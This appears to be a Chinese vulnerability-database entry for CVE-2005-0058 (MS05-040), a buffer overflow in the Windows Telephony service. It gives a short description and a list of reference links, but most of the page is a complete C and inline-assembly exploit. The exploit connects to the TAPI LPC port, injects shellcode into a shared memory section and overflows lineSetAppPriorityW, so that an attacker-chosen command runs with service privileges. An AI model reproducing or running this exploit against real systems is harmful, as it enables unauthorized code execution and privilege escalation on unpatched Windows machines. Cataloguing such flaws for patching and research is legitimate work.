Microsoft Windows Telephony服务 远程代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109910 漏洞类型 缓冲区溢出
发布时间 2006-03-14 更新时间 2007-11-03
CVE编号 CVE-2005-0058 CNNVD-ID CNNVD-200508-085
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1584
https://www.securityfocus.com/bid/14518
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-085
|漏洞详情
MicrosoftWindows是微软发布的非常流行的操作系统,其中的Telephony服务提供电话应用程序编程接口(TAPI)支持。Windows系统电话应用编程接口(TAPI)中的漏洞允许攻击者完全控制受影响的系统。在Windows2000Server上,任何匿名用户都可以通过发送特制消息来利用这个漏洞;在WindowsServer2003上,Telephony服务仅限于通过认证的用户帐号;在Windows2000Professional和WindowsXP上,攻击者必需本地登陆到系统并运行程序才能利用这个漏洞。
|漏洞EXP
// by Cesar Cerrudo - Argeniss - www.argeniss.com
// 
// TAPI Vulnerability- MS05-040
//
// Should work on Win2k sp0,sp1,sp2,sp3,sp4 any language
// If Telephony Service is not running you can start it by net start "Telephony Service"

#include "windows.h"
#include "stdio.h"
#include "tapi.h"

typedef struct _UNICODE_STRING {
  USHORT  Length;
  USHORT  MaximumLength;
  PWSTR  Buffer;
} UNICODE_STRING;


typedef struct LpcSectionMapInfo{
        DWORD Length;
        DWORD SectionSize;
        DWORD ServerBaseAddress;
} LPCSECTIONMAPINFO;


typedef struct LpcSectionInfo {
        DWORD Length;
        HANDLE SectionHandle;
        DWORD Param1;
        DWORD SectionSize;
        DWORD ClientBaseAddress;
        DWORD ServerBaseAddress;
} LPCSECTIONINFO;

#define SHARED_SECTION_SIZE 0x1000

typedef struct _OBJDIR_INFORMATION {
  UNICODE_STRING          ObjectName;
  UNICODE_STRING          ObjectTypeName;
  BYTE                    Data[1];
} OBJDIR_INFORMATION;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING *ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        
    PVOID SecurityQualityOfService;  
} OBJECT_ATTRIBUTES;

#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
    (p)->RootDirectory = r;                             \
    (p)->Attributes = a;                                \
    (p)->ObjectName = n;                                \
    (p)->SecurityDescriptor = s;                        \
    (p)->SecurityQualityOfService = NULL;               \
    }

WCHAR  * uString=(WCHAR  *) HeapAlloc(GetProcessHeap(), 0, 0x100);
LPVOID lpLocalAddress,lpTargetAddress;


DWORD ConnectToLPCPort(){

	HMODULE hNtdll;	
	HANDLE hPort;
	LPCSECTIONINFO sectionInfo;
	LPCSECTIONMAPINFO mapInfo;
	byte ConnectDataBuffer[100];
	DWORD Size = sizeof(ConnectDataBuffer);
	WCHAR  * uString=L"\\RPC Control\\tapsrvlpc";//TAPI LPC port
	DWORD i;
	UNICODE_STRING uStr;

	for (i=0;i<100;i++)
		ConnectDataBuffer[i]=0x0;


	hNtdll=LoadLibrary("ntdll.dll");

	DWORD (WINAPI * pfnNtConnectPort)(HANDLE*,UNICODE_STRING * ,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*);
	pfnNtConnectPort= (DWORD (WINAPI *)(HANDLE* ,UNICODE_STRING *,SECURITY_QUALITY_OF_SERVICE*,DWORD*,DWORD*,DWORD*,DWORD*,DWORD*))GetProcAddress(hNtdll,"NtConnectPort");

	DWORD (WINAPI * pfnCreateSection)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD);
    pfnCreateSection= (DWORD (WINAPI *)(HANDLE* ,DWORD,DWORD,PLARGE_INTEGER,DWORD,DWORD,DWORD))GetProcAddress(hNtdll,"NtCreateSection");

	HANDLE hSection;
	LARGE_INTEGER SecSize;
	DWORD maxSize=0;
	
	SecSize.LowPart=0x1000;
	SecSize.HighPart=0x0;

	SECURITY_QUALITY_OF_SERVICE qos;
    DWORD qosSize=4;
	qos.Length =(DWORD)&qosSize;
	qos.ImpersonationLevel =(_SECURITY_IMPERSONATION_LEVEL)0x2;
	qos.ContextTrackingMode =0x01000101;
	qos.EffectiveOnly =0x10000;
	
	//create shared section
	pfnCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAGE_READWRITE,SEC_COMMIT ,NULL);

	memset(&sectionInfo, 0, sizeof(sectionInfo));
	memset(&mapInfo, 0, sizeof(mapInfo));

	sectionInfo.Length = 0x18;
	sectionInfo.SectionHandle =hSection;
	sectionInfo.SectionSize = SHARED_SECTION_SIZE;
	mapInfo.Length = 0x0C;

	uStr.Length = wcslen(uString)*2;
	uStr.MaximumLength = wcslen(uString)*2+2;
	uStr.Buffer =uString;
	
	//connect to LPC port
	if (!pfnNtConnectPort(&hPort,&uStr,&qos,(DWORD *)&sectionInfo,(DWORD *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){
		lpLocalAddress =(LPVOID)sectionInfo.ClientBaseAddress ; 
		lpTargetAddress =(LPVOID)sectionInfo.ServerBaseAddress ;
		return 1;
	}

	return 0;
}

 
int main(int argc, char* argv[])
{

  HMODULE hKernel;
  DWORD iStrLen;
  FARPROC pWinExec,pExitThread;
  LPSTR sCommand;


  if (!argv[1]) {
	printf("\nUsage :\n	TapiExploit \"command\" \n");
	printf("\nExample :\n  TapiExploit \"cmd.exe\" \n");
	exit(0);
  }
    
  iStrLen=strlen(argv[1]);

  if(iStrLen>=65){
	printf("\n\"command\" must be less than 65 chars.\n");
	exit(0);
  }

  sCommand=argv[1];

  if (!ConnectToLPCPort()){ //connect to TAPI LPC port 
	printf("Could not connect to LPC port \nTAPI service couldn't be running\nTry again."); 
	exit(0);
  }


  hKernel=LoadLibrary("Kernel32.dll");
	
//  pWinExec=GetProcAddress(hKernel,"WinExec");
  pWinExec=GetProcAddress(hKernel,"CreateProcessA");
  pExitThread=GetProcAddress(hKernel,"ExitThread");

CHAR sWinSta[]="WinSta0\\Default";

	//copy shellcode
_asm {

	pushad

	lea esi, Shellcode
	mov edi, lpLocalAddress  
	add edi, 0x10
	lea ecx, End
	sub ecx, esi
	push esi
	push edi
	cld
	rep movsb

	pop edi
	pop esi
	push edi

	lea ecx, CommandBuf
	sub ecx, esi
	add edi, ecx
	mov esi, sCommand
	mov ecx, iStrLen
	rep movsb
	mov [edi], 0x00

	pop edi
	mov esi, pWinExec
	mov [edi+0x0a], esi

	mov esi, pExitThread
	mov [edi+0x0e], esi


//////////////

	add edi, 0x2f0
	lea esi, sWinSta
	mov ecx, 0xf
	cld
	rep movsb


///////////////


	jmp Done

Shellcode:
    jmp Start
				// this gets overwritten
	mov ax,0xffff
	mov ax,0xffff
	mov ax,0xffff	
	mov ax,0xffff	

CommandBuf:					// this gets overwritten
	mov dword ptr[eax],0x55555555
	mov dword ptr[eax],0x55555555	
	mov dword ptr[eax],0x55555555	
	mov dword ptr[eax],0x55555555	
	mov dword ptr[eax],0x55555555	
	mov dword ptr[eax],0x55555555	
	mov dword ptr[eax],0x55555555	
	mov dword ptr[eax],0x55555555	
	mov dword ptr[eax],0x55555555	
	mov dword ptr[eax],0x55555555	
	mov dword ptr[eax],0x55555555	

Start:
	call getDelta

getDelta:
	pop edx							// Get shellcode/shared section pointer
	push edx						

/*	push 0x1						// push 0x0 for hidden window
	lea eax, [edx-0x47]					
	push eax						// Command offset
	call [edx-0x4f]					// Call WinExec
 */
 
	mov eax, edx
	add eax,0x500

	push eax					//LPPROCESS_INFORMATION

	add eax, 0x100
	mov ebx, edx
	xor bl, bl
	lea ecx, [ebx+0x300]
	lea ebx, [eax+0x8]	
	mov [ebx], ecx				//set windows station and desktop
	push eax					//LPSTARTUPINFO
	push 0x0
	push 0x0
	push 0x0
	push 0x0
	push 0x0
	push 0x0
	
	lea eax, [edx-0x47]					
	push eax						// Command offset

	push 0x0
	call [edx-0x4f]					// Call create process



	pop edx
	call [edx-0x4b]					// Call ExitThread

End:

Done:
	popad

  }


  LPSTR   lpszAppFilename=(LPSTR  )HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x21C) ;    
  LINEEXTENSIONID ExtensionID;

  memset(lpszAppFilename,0x58,0x21A);

  _asm{
	pushad

	mov ebx, lpszAppFilename
	lea ebx, [ebx+0x216]
	mov eax, lpTargetAddress
	add eax, 0x10
	mov [ebx], eax

	popad
  }

  lineSetAppPriorityW((LPWSTR )lpszAppFilename,NULL,&ExtensionID,LINEREQUESTMODE_MAKECALL,NULL,NULL);

  Sleep(1000);

  printf("Command should have been executed ;)\n"); 

  return 0;

}

// milw0rm.com [2006-03-14]
|受影响的产品
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional x64 Edition Microsoft Wind
|参考资料

来源:MS
名称:MS05-040
链接:http://www.microsoft.com/technet/Security/bulletin/ms05-040.mspx
来源:SECUNIA
名称:16354
链接:http://secunia.com/advisories/16354/
来源:BID
名称:14518
链接:http://www.securityfocus.com/bid/14518
来源:SECTRACK
名称:1014639
链接:http://securitytracker.com/id?1014639
来源:USGovernment
名称:oval:org.mitre.oval:def:1297
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:1297
来源:USGovernment
名称:oval:org.mitre.oval:def:1213
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:1213
来源:USGovernment
名称:oval:org.mitre.oval:def:1075
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:1075
来源:USGovernment
名称:oval:org.mitre.oval:def:100088
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:100088
来源:USGovernment
名称:oval:org.mitre.oval:def:100086
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:100086
来源:USGovernment
名称:oval:org.mitre.oval:def:100085
链接:http://oval.mitre.org/reposito